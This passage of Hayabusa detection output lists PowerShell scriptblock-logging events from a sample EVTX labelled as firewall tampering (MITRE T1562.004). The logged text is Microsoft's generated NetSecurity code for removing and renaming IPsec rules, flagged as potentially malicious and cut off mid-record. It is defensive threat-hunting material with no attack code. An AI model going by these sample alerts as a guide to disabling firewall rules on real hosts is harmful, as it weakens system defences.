$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' -Alias '*' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Parameter",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Parameter",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious 